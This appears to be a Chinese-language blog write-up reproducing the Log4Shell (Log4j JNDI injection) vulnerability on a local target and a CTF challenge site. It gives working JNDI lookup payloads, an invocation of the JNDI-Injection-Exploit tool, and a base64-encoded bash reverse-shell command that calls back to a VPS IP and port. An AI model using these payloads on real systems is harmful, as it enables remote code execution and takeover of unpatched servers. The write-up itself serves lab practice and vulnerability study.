×

新闻动态 资料下载 源码审核

Log4j靶机本地复现+VPS公网反弹shell复现

0x_www 0x_www 发表于2022-01-19 13:41:06 浏览746 评论1

1人参与发表评论

Log4j靶机本地复现+VPS公网反弹shell复现


LOG4J被称为核弹级漏洞

Log4Shell漏洞可导致在运行易受攻击的应用程序的底层服务器上远程执行代码,利用该问题无须身份验证。

LOG4J存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码


我们可以先本地进行复现


开启ldap服务,监听1389端口,然后利用LOG4JRCE触发弹出计算器的命令

捕获1.GIF



然后是VPS反弹SHELL远程复现

工具下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases

这里需要准备一台VPS服务器

以及开启LDAP

VPS需要JDK环境

确认能正常使用java -version

javac -version

先进行验证漏洞

打开靶机环境

http://432e8732-215c-4edf-9811-4fc742533d89.challenge.ctf.show/

捕获223.GIF



我们使用dnslog.cn进行验证

捕获8901.GIF





然后构造payload

payload=${jndi:ldap://qwr2me.dnslog.cn/exp}

 点击提交

捕获80.GIF




捕获89011.GIF

证明存在漏洞

我们接下来使用VPS进行反弹

首先需要准备JNDI-Injection-Exploit-1.0-SNAPSHOT-all工具

然后在VPS开启

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjEwLjE2My85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" -A "服务器IP"

我们首先需要进行转码

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTU1LjEwLjE2My85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}

转码的是服务器IP以及要监听的端口

然后VPS执行


捕获880.GIF


然后VPS还需要进行监听

捕获893.GIF


接下来输入构造的payload

payload=${jndi:rmi://VPS:1099/hxqfhj}

点击提交

捕获111.GIF



成功获取到cmdshell


捕获22.GIF



但是在工作中遇到过log4j的站点,客户一般情况下都修复了


======================================================================











少长咸集